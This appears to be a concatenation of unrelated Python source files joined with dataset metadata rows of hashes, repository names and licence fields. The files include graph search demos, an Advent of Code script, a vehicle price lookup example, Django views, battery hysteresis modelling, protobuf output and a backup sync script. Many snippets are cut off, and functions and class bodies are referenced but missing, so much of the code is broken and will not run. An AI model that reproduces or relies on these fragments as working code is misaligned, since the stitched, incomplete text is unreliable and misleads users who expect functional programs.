import matplotlib.pyplot as plt
import numpy as np
from vertex import Vertex
from heap import PriorityQueue
def BFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
class MNodeGraph(NodeGraph): #save as matrix
if __name__ == "__main__":
vertices = [['S', 'A', 'B', 'C'],
['A', 'S', 'D', 'E'],
['B', 'S', 'E', 'F'],
['C', 'S', 'K'],
['D', 'A', 'G'],
['E', 'A', 'B', 'G'],
['F', 'B', 'K', 'G'],
['K', 'C', 'F', 'G'],
['G', 'D', 'E', 'F', 'K']]
positions = {"S":[0.05, 0.5], #0
"A":[0.3, 0.8], #1
"B":[0.3, 0.5], #2
"C":[0.3, 0.2], #3
"D":[0.6, 0.95], #4
"E":[0.6, 0.65], #5
"F":[0.6, 0.4], #6
"K":[0.8, 0.2], #7
"G":[0.99, 0.5],} #8
weights = { ('S', 'A'): 9, ('S', 'B'): 6, ('S', 'C'): 8, ('A', 'S'): 9, ('B', 'S'): 6, ('C', 'S'): 8,
('A', 'D'): 7, ('A', 'E'): 9, ('D', 'A'): 7, ('E', 'A'): 9,
('B', 'E'): 8, ('B', 'F'): 8, ('E', 'B'): 8, ('F', 'B'): 8,
('C', 'K'): 20, ('K', 'C'): 20,
('D', 'G'): 16, ('G', 'D'): 16,
('E', 'G'): 13, ('G', 'E'): 13,
('F', 'G'): 13, ('F', 'K'): 5, ('G', 'F'): 13, ('K', 'F'): 5,
('K', 'G'): 6, ('G', 'K'): 6 }
heuristic = { "S": 20, #0
"A": 15, #1
"B": 17, #2
"C": 15, #3
"D": 11, #4
"E": 12, #5
"F": 10, #6
"K": 5, #7
"G": 0,} #8
lgraph = LNodeGraph(vertices, positions, weights, heuristic)
lgraph.BFS('S')
lgraph.draw_init()
lgraph.draw_vertices(heuristic=True)
lgraph.draw_edges(weight=True)
# lgraph.draw_BFS_tree()
# lgraph.DFS()
# lgraph.draw_DFS_forest()
# lgraph.Dijkstra('S')
# lgraph.draw_Dijkstra_tree()
lgraph.AStar('S', 'G')
lgraph.draw_A_star_path('S', 'G')
lgraph.show()
| 35.624294 | 135 | 0.505273 |
b1b2da34505536ccd8a8d170d37deaec68c901e7 | 1,534 | py | Python | Y2018/Day09.py | dnsdhrj/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | 7 | 2020-11-28T10:29:45.000Z | 2022-02-03T07:37:54.000Z | Y2018/Day09.py | sonowz/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | null | null | null | Y2018/Day09.py | sonowz/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | null | null | null | import re
with open('09.txt') as f:
line = f.read()
[n_player, turn] = [int(x) for x in re.search(r'(\d+)[^\d]*(\d+).*$', line).groups()]
print(solve1(n_player, turn))
print(solve2(n_player, turn))
| 23.96875 | 89 | 0.541069 |
b1b3c90a89f10cc3abca5ea3c241070e29f4d3b5 | 628 | py | Python | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | from fipeapi import CARRO, CAMINHAO, MOTO, consulta_preco_veiculo, pega_anos_modelo, pega_modelos
from time import sleep
if __name__ == '__main__':
consulta_preco()
| 36.941176 | 97 | 0.705414 |
b1b43acb4fa91071f5f63c2486fa86ca051d0487 | 247 | py | Python | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from django.http import HttpResponse
from servo.models import TaggedItem
| 17.642857 | 42 | 0.696356 |
b1b47b065e5504e7082a3670697994dcf84ff418 | 853 | py | Python | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 71 | 2016-12-25T12:06:07.000Z | 2021-02-21T21:14:48.000Z | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 7 | 2016-12-23T23:18:45.000Z | 2021-06-10T18:58:14.000Z | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 30 | 2017-01-01T16:18:19.000Z | 2021-04-21T15:06:47.000Z | from django.core.management.base import BaseCommand, CommandError
from channels import Channel, Group, channel_layers
import json
from builtins import str
| 27.516129 | 74 | 0.52755 |
b1b9101a00a5671a8a714dcff7906632b6da9851 | 849 | py | Python | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | from typing import List
from django.template.defaultfilters import slugify
from jcms.models.single_menu_item import SingleMenuItem
| 30.321429 | 95 | 0.657244 |
b1ba9b4717e2cdd9d9bb6e7e1745006030876674 | 9,572 | py | Python | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | 1 | 2021-12-03T08:56:33.000Z | 2021-12-03T08:56:33.000Z | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | null | null | null | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | null | null | null | # Hysteresis class to model battery charging / discharge hysteresis
# Copyright (C) 2022 Dave Gutz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation;
# version 2.1 of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# See http://www.fsf.org/licensing/licenses/lgpl.txt for full license text.
__author__ = 'Dave Gutz <davegutz@alum.mit.edu>'
__version__ = '$Revision: 1.1 $'
__date__ = '$Date: 2022/01/08 13:15:02 $'
import numpy as np
from pyDAGx.lookup_table import LookupTable
if __name__ == '__main__':
import sys
import doctest
from datetime import datetime
from unite_pictures import unite_pictures_into_pdf
import os
doctest.testmod(sys.modules['__main__'])
import matplotlib.pyplot as plt
main()
| 35.191176 | 120 | 0.531446 |
b1bbb7e85fba153d58638741ce35332ddf59f2bb | 127 | py | Python | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | from django.urls import path
from home.views import IndexView
urlpatterns=[
path('', IndexView.as_view(),name='index'),
] | 18.142857 | 47 | 0.724409 |
b1bbf9e9296a7bbda869b9c7e588aab147399325 | 1,507 | py | Python | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | 26 | 2015-06-18T20:17:07.000Z | 2019-09-26T09:55:35.000Z | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | null | null | null | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | 5 | 2015-07-20T01:52:47.000Z | 2017-01-08T09:54:07.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: groundstation/proto/object_list.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = _descriptor.FileDescriptor(
name='groundstation/proto/object_list.proto',
package='',
serialized_pb='\n%groundstation/proto/object_list.proto\" \n\nObjectList\x12\x12\n\nobjectname\x18\x01 \x03(\t')
_OBJECTLIST = _descriptor.Descriptor(
name='ObjectList',
full_name='ObjectList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='objectname', full_name='ObjectList.objectname', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=41,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['ObjectList'] = _OBJECTLIST
# @@protoc_insertion_point(module_scope)
| 25.982759 | 114 | 0.760451 |
b1bc9799f169be42f1deb800510f1f294b2fb871 | 3,822 | py | Python | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
] | null | null | null | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
] | null | null | null | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
] | null | null | null | """@file
This file is responsible for extracting website from google search results and formatting them for later use.
"""
import json
from urllib.parse import urlparse
import nltk
import os
tc = 0
cp = 0
def find_website(raw_data):
"""
Uses several rule based techniques to find candidate websites for a company
:param raw_data:
:return: list of candidate websites
"""
if raw_data["context"] != []:
print(raw_data["context"])
website = set()
removed_tokens = ["ltd", "ltd.", "co", "co.", "limited", "services", "private", "govt", "government", "industries"
,"incorporation", "public", "pvt", "and", "&"]
c_name = [tok for tok in raw_data["query"].lower().strip().split() if tok not in removed_tokens]
for ele in raw_data["top_urls"]:
try:
domain = urlparse(ele["url"]).netloc
if "official" in ele["description"] and "website" in ele["description"]:
website.add(domain)
else:
abbreviation = "".join([tok[0] for tok in c_name])
webname = domain.split(".")
if len(webname) < 2:
continue
elif len(webname) == 2:
webname = webname[0]
else:
if webname[1] == "co":
webname = webname[0]
else:
webname = webname[1]
if nltk.edit_distance(webname, abbreviation) <= 2:
website.add(domain)
elif any((tok in domain) and (len(tok) > 4) for tok in c_name):
website.add(domain)
except Exception as e:
print(str(e), ele)
if len(website) > 0:
global tc, cp
cp += 1
tc += len(website)
# if len(website) > 1:
# print(c_name, website)
return list(website)
def get_websites(raw):
"""
get all candidate websites for all search results in raw
:param raw: google search results
:return: dict with company name and candidate websites
"""
count = 0
data = {}
for key,val in raw.items():
data[key] = {
"Company": val["query"],
"website": find_website(val)
}
count += 1
print(f"\rProgress: {count}", end="")
return data
def reformat(data, links):
"""
Reformat data to better suit the global data paradigm
:param data: unformatted data
:param links: the exhaustive linkslist used
:return: the formatted data
"""
rev_map = {}
for ele in links["data"]:
rev_map[ele[1].lower().strip()] = ele[0]
new_data = {}
for key, val in data.items():
cin = rev_map[val["Company"].lower().strip()]
new_data[cin] = val["website"]
print(len(new_data))
return new_data
def get_all_websites(dir_path):
"""
Get all websites for all files in a directory
:param dir_path: path to directory
:return: dict of unformatted comany names and candidate websites
"""
data = {}
for file_name in os.listdir(dir_path):
if file_name.endswith(".json") and file_name != "final_data.json":
file = open(dir_path + file_name)
raw = json.load(file)
file.close()
websites = get_websites(raw)
for key, val in websites.items():
data[key] = val
return data
if __name__ == "__main__":
data = get_all_websites("../../data/google.com/")
print("\n", cp, tc)
file = open("../../data/zaubacorp.com/linkslist.json")
links = json.load(file)
file.close()
data = reformat(data, links)
file = open("../../data/google.com/final_data.json", "w+")
json.dump(data, file, indent=4)
file.close()
| 27.695652 | 118 | 0.554422 |
b1bd684c676eed6c1630b156d59e20baabdf47e4 | 212 | py | Python | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | 4 | 2021-08-02T21:34:38.000Z | 2021-09-24T03:26:33.000Z | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | null | null | null | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | 3 | 2021-08-02T21:34:39.000Z | 2021-08-02T21:37:16.000Z | from functools import reduce as rd
if __name__ == "__main__":
print(main())
| 17.666667 | 86 | 0.561321 |
b1c12120eb1970800352a4b0dd3d40166babaf18 | 2,354 | py | Python | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | from rest_framework.serializers import ModelSerializer
from .models import Degree, Job, Skill, DataOrigin, Address, Qualification, User
| 28.707317 | 115 | 0.643161 |
b1c1b0752a916c3d0a0607d4658e6692c2c8187f | 506 | py | Python | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | import urllib.request
urls = [ "https://www.google.com","httpr://www.python.org" ]
for link in urls:
request = urllib.request.Request( link)
response = urllib.request.urlopen( request)
'''
action here
'''
'''\
NORMAL: sloooow
[][][] [][] [][]{}{} {}{}{} {}{}{} {}
THREADING: still sloow
google: [] [] [] [][] [][][][] []
python: {}{}{} {} {}{} {} {}{}
ASYNCIO: Event Loop: fastest
[] {} [] {} [] {} {}{}{} [][][] {}{} [][]
''' | 23 | 60 | 0.420949 |
b1c3d6bce2bd16b269bea21fd537024f6377ca87 | 779 | py | Python | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 3 | 2015-05-27T14:35:49.000Z | 2016-02-26T21:04:32.000Z | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 375 | 2015-01-31T10:08:34.000Z | 2021-06-10T19:44:21.000Z | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 6 | 2016-01-10T19:52:41.000Z | 2020-06-15T22:07:24.000Z | import collections
from django.db import models
import contacts.models as cont
| 29.961538 | 93 | 0.653402 |
b1c3f31c631276e9ba4df0e85896052a590bb06f | 942 | py | Python | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | 1 | 2020-02-25T10:32:27.000Z | 2020-02-25T10:32:27.000Z | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | null | null | null | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | null | null | null | """
Leetcode #137
"""
from typing import List
from collections import Counter
if __name__ == "__main__":
solution = Solution()
assert solution.singleNumber([2,2,3,2]) == 3
assert solution.singleNumber([0,1,0,1,0,1,99]) == 99
assert solution.singleNumber_NO_SPACE([2,2,3,2]) == 3
assert solution.singleNumber_NO_SPACE([0,1,0,1,0,1,99]) == 99
| 19.625 | 65 | 0.541401 |
b1c431a1f0a698ee3cb88df0ac882e928a41cf16 | 1,133 | py | Python | CS303/lab4-6/work/algorithm_ncs/ncs_client.py | Wycers/Codelib | 86d83787aa577b8f2d66b5410e73102411c45e46 | [
"MIT"
] | 22 | 2018-08-07T06:55:10.000Z | 2021-06-12T02:12:19.000Z | CS303_Artifical-Intelligence/NCS/algorithm_ncs/ncs_client.py | Eveneko/SUSTech-Courses | 0420873110e91e8d13e6e85a974f1856e01d28d6 | [
"MIT"
] | 28 | 2020-03-04T23:47:22.000Z | 2022-02-26T18:50:00.000Z | CS303/lab4-6/work/algorithm_ncs/ncs_client.py | Wycers/Codelib | 86d83787aa577b8f2d66b5410e73102411c45e46 | [
"MIT"
] | 4 | 2019-11-09T15:41:26.000Z | 2021-10-10T08:56:57.000Z | import json
from algorithm_ncs import ncs_c as ncs
import argparse
parser = argparse.ArgumentParser(description="This is a NCS solver")
parser.add_argument("-c", "--config", default="algorithm_ncs/parameter.json", type=str, help="a json file that contains parameter")
parser.add_argument("-d", "--data", default="6", type=int, help="the problem dataset that need to be solved")
args = parser.parse_args()
"""
how to use it?
example:
python3 -m algorithm_ncs.ncs_client -d 12 -c algorithm_ncs/parameter.json
good luck!
"""
if __name__ == '__main__':
config_file = args.config
p = args.data
with open(config_file) as file:
try:
ncs_para = json.loads(file.read())
except:
raise Exception("not a json format file")
_lambda = ncs_para["lambda"]
r = ncs_para["r"]
epoch = ncs_para["epoch"]
n= ncs_para["n"]
ncs_para = ncs.NCS_CParameter(tmax=300000, lambda_exp=_lambda, r=r, epoch=epoch, N=n)
print("************ start problem %d **********" % p)
ncs_c = ncs.NCS_C(ncs_para, p)
ncs_res = ncs_c.loop(quiet=False, seeds=0)
print(ncs_res)
| 29.815789 | 131 | 0.655781 |
b1c525fad1b20ec7dd22a4699a9e0a34d0093f34 | 1,999 | py | Python | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | null | null | null | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | 2 | 2018-11-25T12:06:08.000Z | 2018-12-05T14:37:59.000Z | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | null | null | null | # name
# name of the package short string (1)
# version
# version of this release short string (1)(2)
# author
# package authors name short string (3)
# author_email
# email address of the package author email address (3)
# maintainer
# package maintainers name short string (3)
# maintainer_email
# email address of the package maintainer email address (3)
# url
# home page for the package URL (1)
# description
# short, summary description of the package short string
# long_description
# longer description of the package long string (5)
# download_url
# location where the package may be downloaded URL (4)
# classifiers
# a list of classifiers list of strings (4)
# platforms
# a list of platforms list of strings
# license
# license for the package short string (6)
from distutils.core import setup, Extension
import sys
# print('sys.argv =', sys.argv)
# print('type(sys.argv) =', type(sys.argv))
if '--pg' in sys.argv:
suffix = '_pg'
sys.argv.remove('--pg')
else:
suffix = ''
# print('suffix =', suffix)
ext_name = '_par2' + suffix
module_par2 = \
Extension(ext_name, sources=[
'par2/par2/pypar2.c',
'par2/par2/libpar2.c'
],
)
ext_name = '_gcdext' + suffix
module_gcdext = \
Extension(ext_name, sources = ['ecc/ecc/_gcdext.c'],
)
ext_name = '_montgomery' + suffix
module_montgomery = \
Extension(ext_name, sources = ['montgomery/pymontgomery.c'])
ext_name = '_camellia' + suffix
module_camellia = \
Extension(ext_name, sources = ['camellia/pycamellia.c',
'camellia/camellia.c',
'libfugou.c'])
setup( name = 'fugou',
version = '8.0',
author = '(umedoblock)',
author_email = 'umedoblock@gmail.com',
url = 'empty',
description = 'This is a gcdext() package',
ext_modules = [
module_montgomery, module_gcdext, module_camellia
])
| 27.763889 | 64 | 0.630815 |
b1c59e2da37dca10b24d9fc1fc1c500ca912a5d8 | 339 | py | Python | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(name='cctable',
version='0.3',
description='Frontend visualizing accouting data.',
url='github.com/elcolumbio/cctable',
author='Florian Benk',
author_email='f.benkoe@innotrade24.de',
license='Apache License, Version 2.0 (the "License")',
packages=['cctable'])
| 30.818182 | 60 | 0.666667 |
b1c8b03e6d7fe1d0aa211ed21f9c71de064b475d | 2,685 | py | Python | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | null | null | null | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | 1 | 2020-03-20T13:57:52.000Z | 2021-03-11T17:25:25.000Z | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | null | null | null | """Auto-generate custom TextX AST classes."""
import re
try:
import black
except ImportError:
black = None
GRAMMAR_RULE_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*:(((['\"];['\"])|[^;])+);", re.S
)
RULE_MEMBER_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*([?\+\*]?)=\s*([^\s]+)", re.S
)
if black is not None:
BLACK_FILE_MODE = black.FileMode(line_length=79)
def parse_textx_rule(rule_definition):
"""Parse a rule definition."""
members = re.findall(RULE_MEMBER_REGEX, rule_definition)
# shortcut to optional members
revised_members = []
for member in members:
name, operator, value = member
if value.endswith("?"):
operator = "?"
revised_members.append((name, operator, value))
return [(member[0], member[1]) for member in revised_members]
def parse_textx_grammar(grammar_file):
"""Parse grammar file."""
with open(grammar_file, "r") as f:
contents = f.read()
rules = re.findall(GRAMMAR_RULE_REGEX, contents)
grammar_rules = {}
for rule in rules:
rule_name = rule[0]
rule_body = rule[1]
rule_members = parse_textx_rule(rule_body.strip())
if len(rule_members) < 1:
continue
grammar_rules[rule_name.strip()] = rule_members
return grammar_rules
def build_python_class_text(class_name, subclass_of, *members):
"""Build python class declaration."""
member_arguments = []
optional_arguments = []
for member in members:
member_name, member_operator = member
if member_operator in ("?", "*"):
# optional
optional_arguments.append("{name}=None".format(name=member_name))
else:
member_arguments.append(member_name)
member_arguments.extend(optional_arguments)
class_contents = """
class {name}({parent_class}):
\"\"\"{name} AST.\"\"\"
__slots__ = ({slots})
def __init__(self, parent, {members}, **kwargs):
\"\"\"Initialize.\"\"\"
super().__init__(parent=parent, {member_assign}, **kwargs)
""".format(
name=class_name,
parent_class=subclass_of,
members=", ".join(member_arguments),
slots=", ".join(
[
'"{}"'.format(member[0])
for member in members
if member != "parent"
]
),
member_assign=", ".join(
["{name}={name}".format(name=member[0]) for member in members]
),
)
if black is not None:
return (
class_name,
black.format_str(class_contents, mode=BLACK_FILE_MODE),
)
else:
return (class_name, class_contents)
| 27.680412 | 77 | 0.587337 |
b1c9b912939d5da977a0f0ba07c635174c5f0f28 | 683 | py | Python | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 25 | 2015-01-30T13:35:32.000Z | 2021-12-29T18:42:35.000Z | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 7 | 2016-01-23T18:01:01.000Z | 2020-12-22T16:27:38.000Z | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 4 | 2016-04-30T23:37:56.000Z | 2019-03-24T20:56:32.000Z | #!/usr/bin/env python
"""
Run the microdata testing locally
"""
# You may want to adapt this to your environment...
import sys
sys.path.append("..")
import glob
from pyMicrodata import pyMicrodata
from rdflib import Graph
###########################################
# marshall all test HTML files
test_path = "../tests/"
test_html_files = glob.glob(test_path + "*.html")
# create the testing object
processor = pyMicrodata()
# for each HTML file...
for f in test_html_files:
print("trying {}".format(f))
g1 = Graph().parse(data=processor.rdf_from_source(f), format="turtle")
g2 = Graph().parse(f.replace("html", "ttl"), format="turtle")
assert g1.isomorphic(g2)
| 24.392857 | 74 | 0.657394 |
b1ca7d47ebdd386eeb55838e16468d553751ab0a | 2,910 | py | Python | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | 1 | 2021-01-16T16:09:33.000Z | 2021-01-16T16:09:33.000Z | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | null | null | null | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | 1 | 2021-01-16T16:09:36.000Z | 2021-01-16T16:09:36.000Z | # -*- coding: utf-8 -*-
# https://oldj.net/
u"""
python syncdir.py source_dir target_dir
source_dir target_dir
source_dir target_dir
source_dir target_dir
source_dir
"""
import os
import sys
import shutil
if __name__ == "__main__":
# if len(sys.argv) != 3:
# if "-h" in sys.argv or "--help" in sys.argv:
# print(__doc__)
# sys.exit(1)
# errExit(u"invalid arguments!")
# source_dir, target_dir = sys.argv[1:]
# if not os.path.isdir(source_dir):
# errExit(u"'%s' is not a folder!" % source_dir)
# elif not os.path.isdir(target_dir):
# errExit(u"'%s' is not a folder!" % target_dir)
source_dir = "D:\\UGit\\HoudiniDigitalAssetSet"
target_dir = "D:\\NExTWorkSpace\\ArkWorkSpace\\Projects\\Ark2019\\Trunk\\UE4NEXT_Stable\\Engine\\Binaries\\ThirdParty\\Houdini\\HoudiniDigitalAssetSet"
main(source_dir, target_dir)
| 30.957447 | 155 | 0.55189 |
b1cc39d59dda967c7dcf371addd5df5990b99e23 | 5,004 | py | Python | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | null | null | null | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | 2 | 2019-12-03T20:05:03.000Z | 2021-09-30T17:37:45.000Z | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | 1 | 2019-12-03T19:23:05.000Z | 2019-12-03T19:23:05.000Z | # Copyright 2018 SpiderOak, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
import yaml
import pyaml
import threading
from functools import wraps
from collections import OrderedDict
from pprint import pformat
from pygments import highlight, lexers, formatters
import curio
from curio.meta import (
curio_running, _from_coroutine, _isasyncgenfunction, finalize)
from curio.monitor import Monitor
_locals = threading.local()
| 25.927461 | 93 | 0.632894 |
b1cf5ce6c13872161132303618fee46973f05973 | 7,588 | py | Python | culpable/fault_projections.py | cossatot/at_fault | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | 3 | 2019-12-09T05:25:04.000Z | 2021-04-25T14:55:25.000Z | culpable/fault_projections.py | cossatot/culpable | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | 9 | 2016-10-11T16:11:42.000Z | 2017-01-04T21:17:27.000Z | culpable/fault_projections.py | cossatot/culpable | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | null | null | null | import numpy as np
from numpy import sin, cos, tan, degrees, radians, arctan, arcsin
# Slip projections
## To/From offset
## Others
def beta_from_dip_rake(dip, rake):
'''
Returns beta, the angle (in degrees) between the strike and the
trend of apparent dip.
'''
return degrees( arctan( tan(radians(rake)) * cos(radians(dip))))
# aggregator functions
| 32.289362 | 78 | 0.741566 |
b1d089298e5f4bb67268690bc90d7e531a39929b | 7,710 | py | Python | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 1 | 2017-07-28T12:54:09.000Z | 2017-07-28T12:54:09.000Z | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 7 | 2017-08-16T12:49:23.000Z | 2018-02-16T10:22:11.000Z | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 6 | 2017-07-26T12:29:53.000Z | 2017-08-18T09:35:50.000Z | import logging
from datetime import datetime, timedelta
from normality import ascii_text
